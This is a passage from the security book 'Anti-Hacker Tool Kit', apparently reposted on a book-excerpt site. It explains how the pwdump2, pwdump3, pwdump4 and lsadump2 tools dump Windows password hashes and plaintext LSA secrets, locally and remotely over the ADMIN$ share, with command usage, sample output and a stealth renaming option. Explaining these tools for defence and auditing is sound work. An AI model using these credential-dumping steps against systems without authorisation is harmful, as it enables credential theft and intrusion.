GRABBING WINDOWS PASSWORD HASHES

After reviewing the L0phtCrack section of this chapter, it's apparent that Windows password hashes can be viewed by the administrator just as easily as a Unix administrator can view the /etc/shadow file. On the other hand, the Unix /etc/shadow file is a text view that can be viewed in any text editor or simply output to the screen. The Windows SAM database is a binary format that does not lend itself to easy inspection. This is why we need tools such as pwdump or lsadump to grab a text version of the SAM database.

Pwdump

Pwdump2, http://www.openwall.com/passwords/nt.shtml, by Todd Sabin, can be used to extract the hashed passwords from a Windows system. It is a command-line tool that must be run locally on the target system; however, we'll take a look at pwdump3, which can operate remotely, later in this section.

Implementation

The program must be run locally on the system. This is version 2 of a tool first developed by Jeremy Allison of the Samba project. Unlike the first version, pwdump2 is not inhibited by SysKey encryption of the SAM database. SysKey was introduced in Windows NT in an attempt to add additional security to the SAM database, but its effectiveness is questionable, as we will see with pwdump2. The usage for pwdump2 is shown here:

 C:\>pwdump2.exe /? Pwdump2 - dump the SAM database. Usage: pwdump2.exe <pid of lsass.exe> 

It must be run with Administrator privileges in order to obtain the password hashes:

 C:\>pwdump2.exe Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46... Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c... skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee... 

You do not usually have to provide the process ID (PID) for the lsass.exe program. However, you can use some simple ways to find it with the tlist or pulist and the find command (the /i option instructs find to ignore case); or you could simply look in Task Manager if the pid column is selected for display.

 C:\>tlist  find /i "lsass"  244 LSASS.EXE C:\>pulist  find /i "lsass" LSASS.EXE         244  NT AUTHORITY\SYSTEM C:\>pwdump2.exe 244 Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46... Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c... skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee... 

The only drawback with the output from pwdump2 is that L0phtCrack cannot read it. The sole reason for this is that the alphabet characters in the hashes are lowercase; L0phtCrack expects them to be uppercase. John the Ripper has no issue detecting case sensitivities, but we must massage the data into an acceptable format.

Fortunately, the tr utility (translate characters) will set this right for those of you who wish to use the GUI cracker. Tr is common on Unix systems and Cygwin, and it has been ported for Windows as part of the Resource Kit.

 [user@hediwg ]$ cat pwdump.out  tr a-z A-Z ADMINISTRATOR:500:F1E5C5EFBC8CFB7F18136FB05F77A0BF:55C77B761FFA46... ORC:501:CBC501A4D2227783CBC501A4D2227783:F523558E22C95C62A6D6D00C... SKYCLADGIRL:1013:AA5536A42EBE131BAAD3B235B51404EE:DB31A1EE00BFBEE... 

Pwdump3

Pwdump3, http://www.openwall.com/passwords/nt.shtml, by Phil Staubs, expanded the pwdump tool once more by adding remote access to a victim machine. There is even a version, pwdump3e, that encrypts remote connections to prevent malicious users from sniffing sensitive passwords. The usage for pwdump3e differs slightly:

 Usage: PWDUMP3 machineName [outputFile] [userName] C:\>PwDump3.exe victim pwdump.out root C:\>type pwdump.out guest:1001:NO PASSWORD*********************:2DEAC3223C70B24E90F02... wwwadmin:500:NO PASSWORD*********************:9CBD10B05F8E69B62F2... IUSR_WWW01:1003:6E72211CDC51C9F8EB9293C3135F3985:0E2A2DCE3B6ABFBA... 

For pwdump3 to work correctly, you need to be able to establish a session to the ADMIN$ share. Pwdump3 will do this for you and prompt you for the administrator password. Otherwise, you could set up a manual session to the ADMIN$ share with the net command:

 C:\>net use \victim\admin$ * /u:Administrator Type the password for \localhost\admin$: The command completed successfully. 

Pwdump4

Pwdump4 was written to address some shortcomings of pwdump3. You can grab a binary and source version from the OpenWall (John the Ripper) web site, http://www.openwall.com/passwords/nt.shtml. It uses the same technique as its nominal predecessor, pwdump3, but improves the usability when dealing with other character sets and when the ADMIN$ share is not available.

Implementation

The pwdump4 command line closely resembles its peers.

 C:\tools>PWDump4.exe PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.    by bingle@email.com.cn This program is free software based on pwpump3 by Phil Staubs under the GNU General Public License Version 2. Usage: PWDUMP4 [Target  /l] [/s:share] [/o:outputFile] [/u:userName] 

Each option is described in Table 8-1.

Table 8-1: Pwdump4 Command-line Options

Option

Description

Target

Targets computer's IP address or hostname. For localhost use /l .

/l

Targets the local computer. This uses the pwdump2 method of dumping hashes, rather than pwdump3.

/s:share

By default pwdump4 will attempt to access the ADMIN$ (as does pwdump3). Specify an alternate share over which to attempt remote access.

/o:outputFile

Saves results to outputFile.

/u:userName

Connects to share as userName. You will be prompted for the password.

/r:newname

Rename the pwdump service and files copied to the remote computer to newname . This provides very basic stealth.

Probably the most useful feature is the /s option. This enables you to target remote systems for which ADMIN$ is inaccessible, but some other share is accessible. Another by-product of this additional feature is that remote registry access is no longer a requirement. pwdump4 will try to communicate over named pipes (such as via the IPC$ share).

Here is a final tip for users trying to run pwdump4 inside a remote desktop connection. If you execute the command against localhost with the /l option, then you'll likely receive an error along the lines of SRV>Status: CreateRemoteThread failed: 8 . In this case, simply try specifying localhost as the target and have pwdump4 access the ADMIN$ share (or whichever share you find available).

 C:\tools>PWDump4.exe localhost /o:err.txt PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.    by bingle@email.com.cn This program is free software based on pwpump3 by Phil Staubs under the GNU General Public License Version 2. local path of \localhost\ADMIN$ is: C:\WINDOWS connect to localhost for result, plz wait... SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal LSA>Samr Enumerate 6 Users In Domain WIN2K3-WEB.  All Completed. 

Lsadump2

Lsadump2, http://www.bindview.com/Services/RAZOR/Utilities/Windows/lsadump2_readme.cfm, makes the password- harvesting process trivial. Another useful tool by Todd Sabin, it's an update to an original tool created by Paul Ashton. The difference between lsadump2 and the pwdump tool suite is that lsadump2 actually dumps the plaintext password instead of the encrypted hash. Obviously, this is preferable since you won't have to run any password-cracking utilities. Unfortunately, lsadump2 only retrieves a password if it is currently being stored in memory by the Local Security Authority (LSA). This could happen when web applications connect to SQL databases or when a backup utility connects to the system remotely in order to archive files.

Implementation

Lsadump2 requires Administrator access to run. The usage for lsadump2 is shown here:

 C:\>lsadump2.exe Lsadump2 - dump an LSA secret. Usage: lsadump2.exe <pid of lsass.exe> <secret> 

You will have to determine the PID of the lsass (just as with pwdump2):

 C:\>tlist  find /i "lsass"  244 LSASS.EXE 
Tip 

The PID for the LSA process is also stored in the registry under this key: HKLM\SYSTEM\ CurrentControlSet\Control\Lsa\LsaPid.

This tool actually outputs the plaintext "secret" for security- related processes currently in memory. This secret might be the password used by a service account, phone number information for RAS services, or remote backup utility passwords. The output is formatted in two columns :

 aspnet_WP_PASSWORD 61 00 77 00 41 00 39 00 65 00 68 00 68 00 61 00  a.w.A.9.e.h.h.a.  4B 00 38 00  K.8.  

The left column represents the raw hexadecimal values related to the service. The right column contains the printable ASCII representation of the data. If you have recently installed the .NET services on your Windows 2000 system, then you most likely have an ASPNET user. Lsadump2 has kindly revealed the password for that user, shown in bold. Note that Windows stores passwords in Unicode format, which is why there is a null character (00) after each letter. Luckily, the default settings for this user do not permit it to log in remotely or execute commands.



Anti-Hacker Tool Kit
Anti-Hacker Tool Kit, Third Edition
ISBN: 0072262877
EAN: 2147483647
Year: 2006
Pages: 175

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net